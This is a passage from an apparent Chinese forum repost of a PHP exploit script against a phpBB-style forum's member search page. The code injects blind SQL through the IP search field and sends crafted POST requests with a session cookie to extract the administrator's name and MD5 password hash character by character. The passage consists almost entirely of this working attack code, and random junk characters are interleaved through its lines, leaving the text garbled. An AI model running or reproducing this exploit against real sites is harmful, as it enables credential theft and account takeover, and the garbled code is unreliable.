    ) G# X/ z6 Q: |" [5 `2 V$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    / W0 n) ?' J  k1 \echo "sql -> ".$sql."
    ; Y. t* o  s: {, p";
    - v+ u6 Z  B: T% P& U7 ?6 Y$sql=urlencode(strtoupper($sql));
    $ S2 a+ V% }  }3 M" _' Y- e$data="username=";
    , N+ E7 H  u# }! V1 B# V' Q6 A$data.="&amp;icq=";
    0 }$ W! T9 E' M, m/ z  p" k/ B- b$data.="&amp;email="; ( C: m4 {% \) ?. |
    $data.="&amp;aim=";
    % a5 o- k4 Y6 a0 [, I$data.="&amp;joined_select=lt"; 6 V; x4 g7 p9 [
    $data.="&amp;joined="; 6 A% x! A" Z8 @/ v
    $data.="&amp;yahoo="; & ?9 m) n- y' c% \7 v- P: [" @
    $data.="&amp;active_select=lt"; 9 g) B) P7 M1 t; J1 F; V# v0 _
    $data.="&amp;active=";
    . E2 F1 e5 \  b) D2 z$data.="&amp;msn="; # }2 ~4 E8 X: d1 @
    $data.="&amp;count_select=eq";
    . D1 X, M2 [" \6 Y( _$data.="&amp;count=";
    : \" Q0 o5 F" k: J/ b; ^$data.="&amp;jabber=";
    6 O* M. X6 [" |$data.="&amp;sk=c";
    ( x- ?' n4 t* j( s7 z) e6 [2 B( N$data.="&amp;sd=a"; . M9 x- z+ z% S9 h
    $data.="&amp;ip=".$sql;
      s# o) A! |, k$data.="&amp;search_group_id=0";
    9 R+ d# b! j7 L) f, c5 }$ u8 n$data.="&amp;submit=Search"; 5 L- e# Z' h' ^+ f4 T
    $packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0! W5 V4 u* M4 e! F4 ]$ P
    ";
    , W/ m9 X; G" x3 ~3 b& P" A& T& Y$packet.="Content-Type: application/x-www-form-urlencoded; Z% r* t2 L. V8 t0 G4 I
    "; ; W+ I7 p* [- f9 s( L
    $packet.="Host: ".$host."
    " \1 |/ R6 l1 l  j) x( c: S"; & k1 `4 s! v9 E* H! ]
    $packet.="Content-Length: ".strlen($data)."
    - p9 G- U1 s; \1 w, i"; ' k0 L: r2 r1 K9 Z9 o( E
    $packet.="Connection: Close% Q7 @8 g+ o) O1 q
    ";
    2 j( U: p2 M9 d8 _$ z* T$packet.="Cookie: ".$cookie."
    . s2 M3 j& w/ c* o0 _# @6 h/ w* j2 }& H0 s$ N
    ";
    ' z" _  |' s2 j8 ^; ~1 k$packet.=$data;
    " {- e  w4 |3 i; R  Bsendpacketii($packet);
    * H" n& N% @5 ^+ N+ |2 ?4 I/ Pif (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]7 P) i7 V9 U6 T7 e/ b7 V
    ";sleep(2);break;} 3 R% c" U% y9 i" C
    } . N' s' C7 K2 i7 ?
    if ($i==255) {die("Exploit failed...");}
    + q6 B+ E6 s0 H! n8 l$j++; $ r. D. E3 J% j; a: W
    }   L7 n1 t- _7 J7 W
    echo "--------------------------------------------------------------------8 n0 e. @" ^" ~" f7 {$ Z
    ";
    + _. G& U: q& qecho "admin -> ".$admin."# u/ U7 w6 L; J, s5 ?6 i
    "; % \& I" p8 y4 V6 J1 D8 C6 X) C
    echo "password (md5) -> ".$password."  S3 }$ p3 h% o
    ";
    + e  {' M1 M# Z; {echo "--------------------------------------------------------------------, A2 |. F+ A- {
    ";
    6 a7 o4 t: s0 U) y. L7 f7 efunction is_hash($hash)
    5 |0 X  Q6 k' [# ?' E+ H{ 2 R1 B! ^: m9 y( u  @/ v3 f( p
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} / R6 G: l# B8 o, G
    else {return false;} * e+ K9 V4 ~8 V# p- b) q
    }
    . ]  R% @+ f+ a/ ^/ e! Z3 Uif (is_hash($password)) {echo "Exploit succeeded...";}
    8 U: g; R. ]. J5 Helse {echo "Exploit failed...";}
    , O, Q+ |4 y' k2 N: t3 S2 o?>
    & T" @! ~3 |( [% H  a
    : j1 w7 D, A) S% G4 S2 X: q1 f
    % \- ~( t6 R# h, D7 e. p7 r- y" u9 T/ P! U0 v
    2 n5 V* p3 w4 F5 \& K

    2 |, P8 V1 z4 K& k$ v: l( G
    + ~1 W6 r* d4 k9 h5 U% t3 e3 W3 Q! b, m$ K2 p7 F6 J) i" b9 x  n

    2 Q: y1 ~' E& ~, Y3 m8 j
    $ l8 R7 C  i0 x$ }0 J2 A# @* S* ?7 ^( S2 V8 Z' i3 i" f
    % \  {6 Y) {4 `4 G; X1 I

    : W0 H0 a: ^5 H7 M% h4 L9 h/ r- b2 a3 }+ `- A; k
    3 @3 ~- F( [6 F
    3 y1 }. q! k. C8 a6 S1 Q! f1 R$ `
    ' P7 k5 f7 r7 {$ S6 O# f+ V
    7 ~6 w2 C6 B1 r

    0 J. r. F! o' E4 [公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表